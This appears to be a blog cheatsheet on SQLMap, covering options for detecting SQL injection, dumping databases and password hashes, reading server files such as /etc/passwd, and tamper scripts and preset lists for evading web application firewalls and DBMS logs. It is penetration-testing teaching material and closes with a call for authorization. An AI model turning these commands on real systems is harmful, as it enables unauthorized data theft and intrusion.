Mastering SQLMap: A Comprehensive Guide for Cybersecurity Enthusiasts
Unlock the secrets of SQL Injection with SQLMap. Learn how to detect, exploit, and prevent SQLi vulnerabilities to strengthen your cybersecurity defenses.
SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
You can also watch-out other tutorials at:
This guide serves as a comprehensive cheatsheet for using SQLMap effectively, enhancing your vulnerability assessment and penetration testing capabilities.
Getting Started with SQLMap
SQLMap is designed to make SQL injection testing as automated as possible. Before diving into specific commands and techniques, ensure you have SQLMap installed on your system.
SQLMap is included by default in many cybersecurity distributions like Kali Linux, or it can be directly downloaded from its official repository.
Basic Arguments for SQLMap
Generic Usage
-u "<URL>"
: Specify the target URL.-p "<PARAM TO TEST>"
: Define the parameter to test for SQL injection.--user-agent=SQLMAP
: Use a specific User-Agent;--random-agent
selects a random User-Agent.--threads=10
: Set the number of threads.--risk=3
: Set the risk level to maximum (1-3).--level=5
: Set the testing level to maximum (1-5).--dbms="<KNOWN DB TECH>"
: If the DBMS is known, specify it to speed up the test.--os="<OS>"
: Specify the operating system of the database server.--technique="UB"
: Use only specified SQL injection techniques (e.g., UNION and Blind).--batch
: Run in non-interactive mode, accepting default answers to questions.--proxy=http://127.0.0.1:8080
: Use a proxy for traffic.
Retrieve Information
Internal
--current-user
: Retrieve the current database user.--is-dba
: Check if the current user has DBA privileges.--hostname
: Obtain the hostname of the database server.--users
: List database users.--passwords
: Fetch user passwords.--privileges
: Get user privileges.
DB Data
--dbs
: List databases.--tables -D <DB NAME>
: List tables in a specific database.--columns -D <DB NAME> -T <TABLE NAME>
: List columns in a specific table.--dump -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME>
: Dump column data.
Advanced Usage
Injection in Different Places
- From Burp/ZAP Capture: Use
-r req.txt
to specify a request file captured from Burp Suite or OWASP ZAP. - GET Request Injection: Directly target parameters in the URL with
-u "http://example.com/?id=1" -p id
. - POST Request Injection: For POST requests, use
--data "username=*&password=*"
to specify POST data. - Headers and Other HTTP Methods: Inject into headers, cookies, or use other HTTP methods with
--cookie
,--headers
, and--method
.
Customizing Injection
- String Matching: Use
--string="text_when_true"
to specify a string present when the query is successful. - Eval Function: With
--eval
, modify payloads with Python commands before sending. - File Reading: Retrieve files from the server with
--file-read=/etc/passwd
.
Automated and Targeted Testing
- Crawl and Auto-Exploit: Use
--crawl=1
to crawl a website and automatically test all links found for SQL injection. - Second-Order Injection: Specify a second request with
--second-order
to test for second-order SQL injection vulnerabilities.
Customizing Injection Techniques
Tamper Scripts:
Utilize --tamper=<name>
to bypass web application firewalls (WAFs) or filters with pre-defined or custom tamper scripts.
Here is a list of the temper:
| Tamper | Description |
|-----------------------------|-----------------------------------------------------------------------------------------------------------------|
| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart |
| appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
| base64encode.py | Base64 all characters in a given payload |
| between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces space character after SQL statement with a valid random blank character. Afterwards replace character = with LIKE operator |
| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
| equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' |
| escapequotes.py | Slash escape quotes (' and ") |
| greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
| halfversionedmorekeywords.py| Adds versioned MySQL comment before each keyword |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Embraces complete query with versioned comment |
| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
| multiplespaces.py | Adds multiple spaces around SQL keywords |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters |
| percentage.py | Adds a percentage sign ('%') infront of each character |
| overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
| randomcase.py | Replaces each keyword character with random case value |
| randomcomments.py | Add random comments to SQL keywords |
| securesphere.py | Appends special crafted string |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
| space2comment.py | Replaces space character (' ') with comments |
| space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
| space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
| space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
| space2plus.py | Replaces space character (' ') with plus ('+') |
| space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
| unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
| uppercase.py | Replaces each keyword character with upper case value 'INSERT' |
| varnish.py | Append a HTTP header 'X-originating-IP' |
| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
Then from this article, we can have the following configurations:
- General Tamper Testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode, charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces, nonrecursivereplacement,percentage,randomcase,securesphere,space2comment, space2plus,space2randomblank,unionalltounion,unmagicquotes
- MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces, nonrecursivereplacement,percentage,randomcase,securesphere,sp_password, space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus, space2randomblank,unionalltounion,unmagicquotes
- MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike, greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned, modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage, randomcase,securesphere,space2comment,space2hash,space2morehash, space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes, versionedkeywords,versionedmorekeywords,xforwardedfor
Suffix and Prefix:
Manipulate query termination or injection points with --suffix
and --prefix
.
Practical Examples
A. Simple GET Request Test
sqlmap -u "http://example.com/?id=1" -p id
B. Using a Proxy for Testing
sqlmap -u "http://example.com" -p "user" --proxy=http://127.0.0.1:8080
C. Database Dump
sqlmap -u "http://example.com/?id=1" -p id --dump
Conclusion
SQLMap is a powerful tool for automating the detection and exploitation of SQL injection vulnerabilities. With this cheatsheet, you’re well-equipped to conduct thorough testing, ensuring your databases are secured against SQL injection attacks.
Remember, ethical hacking and penetration testing should only be conducted with explicit permission from the system owners. Use SQLMap responsibly to help secure applications and educate others about the importance of database security.
For more detailed guides on cybersecurity techniques and tools, follow the provided links to additional resources and support the cybersecurity community through platforms like HackTricks.
Feel free to share your SQLMap success stories, tips, or ask questions in the comments below. Let’s continue to grow our knowledge and secure the digital world together.
Learn more about SQL Injection from the previous article:
Would you like to explore more tools and techniques in cybersecurity? Follow me on Medium and connect on social platforms for continuous updates on security insights and tutorials.